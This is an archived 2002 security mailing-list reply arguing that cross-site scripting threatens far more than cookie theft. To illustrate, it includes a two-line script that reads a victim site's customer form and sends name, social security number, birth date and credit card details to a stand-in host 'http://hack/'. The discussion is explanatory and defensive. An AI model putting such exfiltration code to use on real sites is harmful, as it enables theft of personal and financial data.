Re: CSS, CSS & let me give you some more CSS

From: Andre Mariën (andre.marien@ubizen.com)
Date: 02/04/02


Date: Mon, 04 Feb 2002 11:06:49 +0100
From: Andre Mariën <andre.marien@ubizen.com>


E M wrote:
>
> I think we are getting away from the original topic, CSS and how it affects
> you.
>
> Basically the general agreement is that cookie stealing via embedded code is
> the most dangerous use for CSS and the most common.
>
> This brings me to the point that cookie based authentication is unsafe
> inherently and as far as I can tell not something that security minded
> developers would even consider.

To be clear: cookies are keep-alive session IDs, not real
authenticators.
Their inherent security is similar to uid/pw: replayable, sniffable string,
with a more limited lifetime.

> So the gist is that CSS is mainly used to exploit older web apps that use
> cookie based authentication (Prime example older versions of Yet another
> Bulletin Board (Yabb)). Not to say it can't be used for other things, just
> that from what I'm seeing... it's not.

Suppose someone runs this script:

w = open('form.htm','form.htm');
url='http://hack/'+encode(w.f.name+w.f.ssn+w.f.birth+w.f.cc);

where form is a customer detail page update form from
the site under attack.
The url that is produced picks up very nice information
(social security number, credit card; whatever nice stuff is there)

It does not matter how you secured the site, as long as it does
not require human intervention anymore (!) at the time of attack.
To spell it out: cookies, basic authentication, SSL3: who cares?

Regardless of the fact that one does not see how things can be abused,
the mere fact that someone can do things he shouldn't have been able to do,
should be enough to protect against it.


